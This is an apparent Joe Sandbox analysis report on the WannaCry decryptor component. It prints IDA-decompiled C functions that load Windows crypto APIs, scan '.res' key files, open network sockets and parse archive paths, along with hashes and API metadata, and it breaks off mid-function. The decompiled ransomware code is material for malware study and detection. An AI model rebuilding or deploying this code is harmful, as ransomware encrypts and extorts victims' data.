                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$My Computer$\$\
                                  • API String ID: 1476605332-298172004
                                  • Opcode ID: e7d60ef9c1856895ef116a6a5a4c73b4dd5c7b1159c6abcdc394c11f2446cc8f
                                  • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                  • Opcode Fuzzy Hash: e7d60ef9c1856895ef116a6a5a4c73b4dd5c7b1159c6abcdc394c11f2446cc8f
                                  • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404B70() {
                                  				_Unknown_base(*)()* _t9;
                                  				struct HINSTANCE__* _t20;
                                  
                                  				if( *0x4217c0 == 0) {
                                  					_t20 = LoadLibraryA("advapi32.dll");
                                  					if(_t20 == 0) {
                                  						L10:
                                  						return 0;
                                  					} else {
                                  						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
                                  						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
                                  						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
                                  						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
                                  						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
                                  						_t9 = GetProcAddress(_t20, "CryptGenKey");
                                  						 *0x4217d4 = _t9;
                                  						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
                                  							goto L10;
                                  						} else {
                                  							return 1;
                                  						}
                                  					}
                                  				} else {
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                  • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                  • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                  • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                  • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                  • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                  • API String ID: 2238633743-2459060434
                                  • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                  • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E004080C0(intOrPtr __ecx) {
                                  				void _v999;
                                  				char _v1000;
                                  				void* _v1012;
                                  				char _v1100;
                                  				char _v1200;
                                  				char _v1476;
                                  				signed char _v1520;
                                  				intOrPtr _v1648;
                                  				void _v1656;
                                  				intOrPtr _v1660;
                                  				intOrPtr _v1664;
                                  				intOrPtr _v1668;
                                  				intOrPtr _v1672;
                                  				intOrPtr _v1696;
                                  				void _v1788;
                                  				void _v1792;
                                  				void* _v1796;
                                  				char _v1800;
                                  				intOrPtr _v1804;
                                  				intOrPtr _v1808;
                                  				void* _v1820;
                                  				char _t44;
                                  				void* _t47;
                                  				void* _t50;
                                  				void* _t54;
                                  				int _t57;
                                  				int _t60;
                                  				int _t62;
                                  				struct _WIN32_FIND_DATAA* _t74;
                                  				intOrPtr _t103;
                                  				void* _t104;
                                  				struct _IO_FILE* _t105;
                                  				void* _t110;
                                  				intOrPtr _t113;
                                  				void* _t114;
                                  				void* _t126;
                                  
                                  				_t103 = __ecx;
                                  				memset( &_v1788, 0, 0x21 << 2);
                                  				_t44 =  *0x421798; // 0x0
                                  				_v1000 = _t44;
                                  				_v1808 = _t103;
                                  				memset( &_v999, 0, 0xf9 << 2);
                                  				_t110 =  &_v1808 + 0x18;
                                  				asm("stosw");
                                  				_t74 =  &_v1520;
                                  				_v1804 = 0;
                                  				asm("stosb");
                                  				_t47 = FindFirstFileA("*.res", _t74);
                                  				_v1796 = _t47;
                                  				if(_t47 == 0xffffffff) {
                                  					L13:
                                  					_push(_v1804);
                                  					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
                                  					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
                                  					_t113 = _t110 + 0x30;
                                  					_push(0);
                                  					_v1808 = _t113;
                                  					L00412CAA();
                                  					_t79 = _t103;
                                  					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
                                  					if(_t54 != 0xffffffff) {
                                  						return _t54;
                                  					}
                                  					_push(0);
                                  					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
                                  					L00412CAA();
                                  					return E004082C0(_t103, _t113 + 0x340, _t79);
                                  				} else {
                                  					goto L2;
                                  					L11:
                                  					_t104 = _v1796;
                                  					_t74 =  &_v1520;
                                  					_t57 = FindNextFileA(_t104, _t74);
                                  					_t124 = _t57;
                                  					if(_t57 != 0) {
                                  						L2:
                                  						if((_v1520 & 0x00000010) == 0) {
                                  							asm("repne scasb");
                                  							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
                                  								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
                                  								_t110 = _t110 + 0xc;
                                  								if(_t60 >= 1) {
                                  									_t105 = fopen( &_v1476, "rb");
                                  									_t110 = _t110 + 8;
                                  									if(_t105 != 0) {
                                  										_t62 = fread( &_v1656, 0x88, 1, _t105);
                                  										_t114 = _t110 + 0x10;
                                  										if(_t62 == 1 && _v1648 == _v1800) {
                                  											_v1804 = _v1804 + 1;
                                  										}
                                  										fclose(_t105);
                                  										_t110 = _t114 + 4;
                                  										if(_v1648 == 0) {
                                  											memcpy( &_v1792,  &_v1656, 0x22 << 2);
                                  											_t110 = _t110 + 0xc;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						goto L11;
                                  					} else {
                                  						FindClose(_t104);
                                  						_t103 = _v1808;
                                  						goto L13;
                                  					}
                                  				}
                                  			}








































                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                  • API String ID: 1530363904-2310201135
                                  • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                  • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • htons.WS2_32 ref: 0040D6C7
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                  • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                  • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                  • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                  • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                  • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                  • closesocket.WS2_32(00000000), ref: 0040D80E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                  • String ID: `
                                  • API String ID: 478405425-1850852036
                                  • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                  • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E00411CF0(intOrPtr* __ecx) {
                                  				intOrPtr _t142;
                                  				signed int _t147;
                                  				signed int _t149;
                                  				intOrPtr _t150;
                                  				void* _t152;
                                  				signed int _t157;
                                  				signed int _t160;
                                  				unsigned int _t162;
                                  				signed char _t164;
                                  				struct _FILETIME _t177;
                                  				struct _FILETIME _t180;
                                  				intOrPtr _t182;
                                  				signed int _t186;
                                  				signed char _t188;
                                  				struct _FILETIME _t204;
                                  				struct _FILETIME _t212;
                                  				signed int _t215;
                                  				signed int _t217;
                                  				signed int _t219;
                                  				intOrPtr* _t226;
                                  				signed int _t231;
                                  				signed int _t232;
                                  				signed int _t234;
                                  				signed int _t235;
                                  				signed int _t239;
                                  				unsigned int _t248;
                                  				signed int _t249;
                                  				int _t252;
                                  				signed char _t264;
                                  				intOrPtr _t269;
                                  				intOrPtr* _t273;
                                  				signed int _t276;
                                  				unsigned int _t297;
                                  				signed int _t299;
                                  				intOrPtr _t300;
                                  				signed int _t303;
                                  				intOrPtr _t307;
                                  				intOrPtr _t309;
                                  				signed int _t311;
                                  				intOrPtr _t312;
                                  				intOrPtr _t313;
                                  				intOrPtr* _t321;
                                  				signed int _t329;
                                  				intOrPtr* _t336;
                                  				void* _t337;
                                  				void* _t338;
                                  				signed int _t340;
                                  				signed int _t341;
                                  				void* _t343;
                                  				void* _t346;
                                  				void* _t348;
                                  				void* _t349;
                                  				void* _t350;
                                  				void* _t351;
                                  				void* _t353;
                                  				void* _t354;
                                  				void* _t355;
                                  				void* _t356;
                                  
                                  				_t312 =  *((intOrPtr*)(_t348 + 0x294));
                                  				_t232 = _t231 | 0xffffffff;
                                  				_t336 = __ecx;
                                  				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
                                  				if(_t312 < _t232) {
                                  					L72:
                                  					return 0x10000;
                                  				} else {
                                  					_t140 =  *__ecx;
                                  					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
                                  						goto L72;
                                  					} else {
                                  						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
                                  							E00411AC0(_t140);
                                  							_t348 = _t348 + 4;
                                  						}
                                  						 *(_t336 + 4) = _t232;
                                  						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
                                  							__eflags = _t312 - _t232;
                                  							if(_t312 != _t232) {
                                  								_t142 =  *_t336;
                                  								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
                                  								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
                                  									E00411390(_t142);
                                  									_t348 = _t348 + 4;
                                  								}
                                  								_t143 =  *_t336;
                                  								__eflags =  *( *_t336 + 0x10) - _t312;
                                  								while(__eflags < 0) {
                                  									E004113E0(_t143);
                                  									_t143 =  *_t336;
                                  									_t348 = _t348 + 4;
                                  									__eflags =  *( *_t336 + 0x10) - _t312;
                                  								}
                                  								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
                                  								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
                                  								_t349 = _t348 + 0x30;
                                  								__eflags = _t147;
                                  								if(_t147 == 0) {
                                  									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
                                  									_t350 = _t349 + 0xc;
                                  									__eflags = _t149;
                                  									if(_t149 == 0) {
                                  										_t150 =  *((intOrPtr*)(_t350 + 0x10));
                                  										_push(_t150);
                                  										L00412CEC();
                                  										_t313 = _t150;
                                  										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
                                  										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
                                  										_t351 = _t350 + 0x14;
                                  										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
                                  										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
                                  											_t346 =  *(_t351 + 0x29c);
                                  											asm("repne scasb");
                                  											_t248 =  !_t232;
                                  											 *_t346 =  *( *_t336 + 0x10);
                                  											_t337 = _t351 + 0x88 - _t248;
                                  											_t249 = _t248 >> 2;
                                  											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
                                  											__eflags = _t252;
                                  											memcpy(_t337 + _t249 + _t249, _t337, _t252);
                                  											_t353 = _t351 + 0x18;
                                  											_t321 = _t353 + 0x190;
                                  											while(1) {
                                  												_t157 =  *_t321;
                                  												__eflags = _t157;
                                  												if(_t157 == 0) {
                                  													goto L23;
                                  												}
                                  												L21:
                                  												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
                                  												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
                                  													_t321 = _t321 + 2;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												L23:
                                  												__eflags = _t157 - 0x5c;
                                  												if(_t157 == 0x5c) {
                                  													_t321 = _t321 + 1;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												__eflags = _t157 - 0x2f;
                                  												if(_t157 == 0x2f) {
                                  													_t321 = _t321 + 1;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												_push("\\..\\");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t41 = _t157 + 4; // 0x4
                                  													_t321 = _t41;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												_push("\\../");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t42 = _t157 + 4; // 0x4
                                  													_t321 = _t42;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												_push("/../");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t43 = _t157 + 4; // 0x4
                                  													_t321 = _t43;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  													goto L23;
                                  												}
                                  												_push("/..\\");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t44 = _t157 + 4; // 0x4
                                  													_t321 = _t44;
                                  													continue;
                                  												}
                                  												asm("repne scasb");
                                  												_t338 = _t321 -  !0xffffffff;
                                  												_t297 =  *(_t353 + 0x70);
                                  												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
                                  												_t354 = _t353 + 0xc;
                                  												 *((char*)(_t354 + 0x13)) = 0;
                                  												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
                                  												_t355 = _t354 + 0xc;
                                  												_t164 = _t162 >> 0x0000001e & 0x00000001;
                                  												_t264 =  !(_t297 >> 0x17) & 0x00000001;
                                  												_t340 =  *(_t355 + 0x3c) >> 8;
                                  												__eflags = _t340;
                                  												 *(_t355 + 0x12) = 0;
                                  												_t234 = 1;
                                  												if(_t340 == 0) {
                                  													L39:
                                  													_t264 = _t297 & 0x00000001;
                                  													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
                                  													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
                                  													_t164 = _t297 >> 0x00000004 & 0x00000001;
                                  													_t299 = _t297 >> 0x00000005 & 0x00000001;
                                  													__eflags = _t299;
                                  													_t234 = _t299;
                                  												} else {
                                  													__eflags = _t340 - 7;
                                  													if(_t340 == 7) {
                                  														goto L39;
                                  													} else {
                                  														__eflags = _t340 - 0xb;
                                  														if(_t340 == 0xb) {
                                  															goto L39;
                                  														} else {
                                  															__eflags = _t340 - 0xe;
                                  															if(_t340 == 0xe) {
                                  																goto L39;
                                  															}
                                  														}
                                  													}
                                  												}
                                  												_t341 = 0;
                                  												__eflags = _t164;
                                  												 *(_t346 + 0x108) = 0;
                                  												if(_t164 != 0) {
                                  													 *(_t346 + 0x108) = 0x10;
                                  												}
                                  												__eflags = _t234;
                                  												if(_t234 != 0) {
                                  													_t219 =  *(_t346 + 0x108) | 0x00000020;
                                  													__eflags = _t219;
                                  													 *(_t346 + 0x108) = _t219;
                                  												}
                                  												__eflags =  *(_t355 + 0x13);
                                  												if( *(_t355 + 0x13) != 0) {
                                  													_t217 =  *(_t346 + 0x108) | 0x00000002;
                                  													__eflags = _t217;
                                  													 *(_t346 + 0x108) = _t217;
                                  												}
                                  												__eflags = _t264;
                                  												if(_t264 != 0) {
                                  													_t215 =  *(_t346 + 0x108) | 0x00000001;
                                  													__eflags = _t215;
                                  													 *(_t346 + 0x108) = _t215;
                                  												}
                                  												__eflags =  *(_t355 + 0x12);
                                  												if( *(_t355 + 0x12) != 0) {
                                  													_t63 = _t346 + 0x108;
                                  													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
                                  													__eflags =  *_t63;
                                  												}
                                  												_t300 =  *((intOrPtr*)(_t355 + 0x58));
                                  												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
                                  												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
                                  												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
                                  												_t356 = _t355 + 8;
                                  												 *(_t356 + 0x30) = _t177;
                                  												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
                                  												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
                                  												_t180 =  *(_t356 + 0x28);
                                  												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
                                  												 *(_t346 + 0x10c) = _t180;
                                  												 *(_t346 + 0x114) = _t180;
                                  												 *(_t346 + 0x11c) = _t180;
                                  												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
                                  												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
                                  												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
                                  												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
                                  												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
                                  													_t329 =  *(_t356 + 0x1c);
                                  												} else {
                                  													_t329 =  *(_t356 + 0x1c);
                                  													 *((char*)(_t356 + 0x1a)) = 0;
                                  													do {
                                  														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
                                  														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
                                  														_t273 = "UT";
                                  														_t186 = _t356 + 0x18;
                                  														while(1) {
                                  															_t235 =  *_t186;
                                  															_t303 = _t235;
                                  															__eflags = _t235 -  *_t273;
                                  															if(_t235 !=  *_t273) {
                                  																break;
                                  															}
                                  															__eflags = _t303;
                                  															if(_t303 == 0) {
                                  																L57:
                                  																_t186 = 0;
                                  															} else {
                                  																_t239 =  *((intOrPtr*)(_t186 + 1));
                                  																_t311 = _t239;
                                  																_t92 = _t273 + 1; // 0x2f000054
                                  																__eflags = _t239 -  *_t92;
                                  																if(_t239 !=  *_t92) {
                                  																	break;
                                  																} else {
                                  																	_t186 = _t186 + 2;
                                  																	_t273 = _t273 + 2;
                                  																	__eflags = _t311;
                                  																	if(_t311 != 0) {
                                  																		continue;
                                  																	} else {
                                  																		goto L57;
                                  																	}
                                  																}
                                  															}
                                  															L59:
                                  															__eflags = _t186;
                                  															if(_t186 == 0) {
                                  																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
                                  																_t343 = _t341 + 5;
                                  																_t276 = 1;
                                  																__eflags = _t188 & 0x00000001;
                                  																 *((char*)(_t356 + 0x12)) = 1;
                                  																if((_t188 & 0x00000001) != 0) {
                                  																	_t309 =  *((intOrPtr*)(_t343 + _t329));
                                  																	_t343 = _t343 + 4;
                                  																	__eflags = 0 << 8;
                                  																	_t212 = E00411B50(_t309, 0 << 8 << 8);
                                  																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                  																	 *(_t346 + 0x11c) = _t212;
                                  																	_t356 = _t356 + 4;
                                  																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
                                  																}
                                  																__eflags = 1;
                                  																if(1 != 0) {
                                  																	_t307 =  *((intOrPtr*)(_t343 + _t329));
                                  																	_t343 = _t343 + 4;
                                  																	__eflags = 0 << 8;
                                  																	_t204 = E00411B50(_t307, 0 << 8 << 8);
                                  																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                  																	 *(_t346 + 0x10c) = _t204;
                                  																	_t356 = _t356 + 4;
                                  																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
                                  																}
                                  																__eflags = _t276;
                                  																if(_t276 != 0) {
                                  																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
                                  																	_t356 = _t356 + 4;
                                  																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
                                  																}
                                  															} else {
                                  																goto L60;
                                  															}
                                  															goto L69;
                                  														}
                                  														asm("sbb eax, eax");
                                  														asm("sbb eax, 0xffffffff");
                                  														goto L59;
                                  														L60:
                                  														_t341 = _t341 + 4;
                                  														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
                                  													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
                                  												}
                                  												L69:
                                  												__eflags = _t329;
                                  												if(_t329 != 0) {
                                  													_push(_t329);
                                  													L00412C98();
                                  													_t356 = _t356 + 4;
                                  												}
                                  												_t182 =  *((intOrPtr*)(_t356 + 0x20));
                                  												memcpy(_t182 + 8, _t346, 0x4b << 2);
                                  												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
                                  												__eflags = 0;
                                  												return 0;
                                  												goto L73;
                                  											}
                                  										} else {
                                  											_push(_t313);
                                  											L00412C98();
                                  											return 0x800;
                                  										}
                                  									} else {
                                  										return 0x800;
                                  									}
                                  								} else {
                                  									return 0x700;
                                  								}
                                  							} else {
                                  								goto L8;
                                  							}
                                  						} else {
                                  							if(_t312 == _t232) {
                                  								L8:
                                  								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
                                  								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
                                  								 *((char*)(_t226 + 4)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x108)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x110)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x114)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x118)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x120)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x124)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x128)) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  							} else {
                                  								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L73:
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /../$/..\$\../$\..\
                                  • API String ID: 0-3885502717
                                  • Opcode ID: 609ee301a0957fc1d178a82fd6ad0030074ae851484ad2f13760bdfbe56840fa
                                  • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                  • Opcode Fuzzy Hash: 609ee301a0957fc1d178a82fd6ad0030074ae851484ad2f13760bdfbe56840fa
                                  • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00407E80() {
                                  				void _v518;
                                  				short _v520;
                                  				short _v540;
                                  				void _v1038;
                                  				char _v1040;
                                  				long _v1060;
                                  				void _v1558;
                                  				short _v1560;
                                  				long _v1580;
                                  				int _t23;
                                  				short _t39;
                                  				void* _t42;
                                  				void* _t54;
                                  				void* _t55;
                                  
                                  				_t39 =  *0x42179c; // 0x0
                                  				_v1040 = _t39;
                                  				memset( &_v1038, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				_v1560 = _t39;
                                  				memset( &_v1558, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				_v520 = _t39;
                                  				memset( &_v518, 0, 0x81 << 2);
                                  				asm("stosw");
